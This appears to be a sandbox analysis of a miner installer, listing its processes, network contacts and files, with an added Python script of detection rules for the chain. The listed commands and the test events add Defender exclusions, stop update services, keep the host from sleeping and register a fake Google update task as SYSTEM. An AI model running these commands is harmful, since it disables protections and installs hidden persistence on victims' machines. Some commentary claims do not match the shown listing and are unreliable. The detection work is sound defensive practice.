"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=16045 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT" --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1424 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1856 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1968 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=16045 --allow-pre-commit-input --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --disable-gpu-compositing --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3248 /prefetch:1

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1416,4627734676911030863,4551325689325878010,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=audio --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=2316 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2f4 0x320

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 844 -ip 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 844 -s 276
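The process list above is the miner installer's whole routine in order: a Defender exclusion for the user profile and Program Files, stopping the Windows Update and BITS services, zeroing the standby and hibernate timeouts so the host never sleeps, a SYSTEM scheduled task named GoogleUpdateTaskMachineQC pointing at updater.exe, and, from cc.exe, headless Chrome and Edge started with --remote-debugging-port against a copied profile directory. Each step is a clean process-creation detection. The script below is an added example written for this report, not part of the page or of any product; the events are constructed records modeled on the command lines above, with the field names pid / image / command_line assumed as a minimal schema (Sysmon event 1 and most EDRs expose equivalents), and pid 6 is a benign Chrome launch included as a control.

```python
"""Process-creation detections for the installer chain in the Processes section."""
import re
from typing import Callable, Dict, List, Optional, Set, Tuple

UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
BROWSERS = {"chrome.exe", "msedge.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Google's own updater registers GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA
# and runs from C:\Program Files (x86)\Google\Update; the task in this report is ...QC.
LEGIT_GOOGLE_TASKS = {"googleupdatetaskmachinecore", "googleupdatetaskmachineua"}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed events modeled on the report's command lines (pid 4 is shortened); pid 6 is benign.
EVENTS = [
    {"pid": 1, "image": PS, "command_line": PS + " Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"},
    {"pid": 2, "image": CMD, "command_line": CMD + " /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc"},
    {"pid": 3, "image": CHROME, "command_line": f'"{CHROME}" --remote-debugging-port=19990 --headless --user-data-dir="C:\\Users\\Admin\\AppData\\Local\\Google\\Chrome\\User DataLOVM1" --profile-directory="Default"'},
    {"pid": 4, "image": PS, "command_line": PS + " <#syxapd#> Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\\Program Files\\Google\\Chrome\\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force"},
    {"pid": 5, "image": CMD, "command_line": CMD + " /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"},
    {"pid": 6, "image": CHROME, "command_line": f'"{CHROME}" --profile-directory="Default"'},
    {"pid": 7, "image": r"C:\Windows\System32\schtasks.exe", "command_line": r'C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"'},
]

Rule = Callable[[str, str], bool]  # (lower-case image basename, lower-case command line) -> hit


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def _user_data_dir(cl: str) -> Optional[str]:
    # Handles both --user-data-dir="C:\x y" and "--user-data-dir=C:\x y" quoting styles.
    m = re.search(r'--user-data-dir="?([^"]+?)"?(?=\s--|\s/|"|$)', cl)
    return m.group(1) if m else None


def defender_exclusion(image: str, cl: str) -> bool:
    return image in SHELLS and "add-mppreference" in cl and "-exclusionpath" in cl


def stop_update_services(image: str, cl: str) -> bool:
    stopped = set(re.findall(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", cl))
    return bool(stopped & UPDATE_SERVICES)


def power_timeouts_zeroed(image: str, cl: str) -> bool:
    return re.search(r"\bpowercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", cl) is not None


def headless_remote_debugging(image: str, cl: str) -> bool:
    # Only the browser process (no --type=) so one launch yields one alert, not one per renderer.
    return image in BROWSERS and "--type=" not in cl and "--remote-debugging-port=" in cl and "--headless" in cl


def cloned_browser_profile(image: str, cl: str) -> bool:
    # A profile copied to a directory other than "...\User Data" sidesteps the running
    # browser's profile lock, the usual reason a stealer drives a second headless instance.
    if image not in BROWSERS or "--type=" in cl:
        return False
    udd = _user_data_dir(cl)
    return udd is not None and not udd.rstrip("\\").endswith("\\user data")


def fake_google_update_task(image: str, cl: str) -> bool:
    m = re.search(r"googleupdatetaskmachine\w*", cl)
    return m is not None and m.group(0) not in LEGIT_GOOGLE_TASKS


RULES: List[Tuple[str, Rule]] = [
    ("defender_exclusion", defender_exclusion),
    ("stop_update_services", stop_update_services),
    ("power_timeouts_zeroed", power_timeouts_zeroed),
    ("headless_remote_debugging", headless_remote_debugging),
    ("cloned_browser_profile", cloned_browser_profile),
    ("fake_google_update_task", fake_google_update_task),
]


def evaluate(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """Map each event's pid to the names of the rules it triggers."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        image = _basename(str(ev["image"]))
        cl = str(ev["command_line"]).lower()
        hits[int(ev["pid"])] = [name for name, rule in RULES if rule(image, cl)]
    return hits


def techniques_seen(events: List[Dict[str, object]]) -> Set[str]:
    return {name for names in evaluate(events).values() for name in names}


if __name__ == "__main__":
    for pid, names in evaluate(EVENTS).items():
        print(pid, names or "-")
```

Any one of these rules fires on plenty of admin activity (powercfg in particular); the signal is the set, which is why techniques_seen() is the function to alert on. Note that the report shows the whole chain twice, once under the user's session and once after updater.exe starts from the SYSTEM task, so a host that matches should be expected to match again on the next boot.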

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\mi.exe

C:\Windows\Temp\setup.exe

C:\Users\Admin\AppData\Local\Temp\cli.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_unumeue1.wyv.ps1

C:\Users\Admin\AppData\Local\Temp\cc.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\CrashpadMetrics-active.pma

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Local State

C:\Windows\system32\drivers\etc\hosts

\??\pipe\crashpad_3784_RLFYXVNJZSEZRVHL

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Local Storage\leveldb\MANIFEST-000001

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Local Storage\leveldb\CURRENT

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Local Storage\leveldb\LOG.old

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Network\TransportSecurity

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Network\Reporting and NEL

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Network\Network Persistent State

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Network\Cookies

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\DawnCache\data_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\DawnCache\data_1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\DawnCache\data_2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\DawnCache\data_3

C:\Program Files\Google\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\index-dir\the-real-index~RFe597db2.TMP

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000001

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\eb350c9423494e4d_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\dcc6e4941ed474f8_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\dc8a3b6ad6cc7dc8_0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Local Storage\leveldb\MANIFEST-000001

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Local Storage\leveldb\CURRENT

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\b6db2c9021afc931_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\9322deff22a9b720_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\931770cbbbf3279e_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\8c5f3f8b8b33bf79_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\677c42d025cfa4d8_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\63f0cac7b2db289e_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\60ae0d0fe9088cac_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\5ddeaca7fe64ca95_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\5b76df05a935e848_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\343f6993e27f1d39_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\2e64514b9cd267ab_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\17e99028d152eccd_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\06db5837b6c74111_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Code Cache\js\056093a36a95204b_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\index

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_00000c

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_00000b

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_00000a

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000009

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000008

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000007

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000006

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000005

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000004

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000003

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\f_000002

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\data_3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\data_2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\data_1

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\Default\Cache\Cache_Data\data_0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataLOVM1\DevToolsActivePort

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Cache\f_000004

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\c3167115-b890-47e3-8b62-48e4698cb9ec\index

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

C:\Users\Admin\AppData\Local\Microsoft\Edge\User DataG71ZT\Default\Code Cache\js\index-dir\the-real-index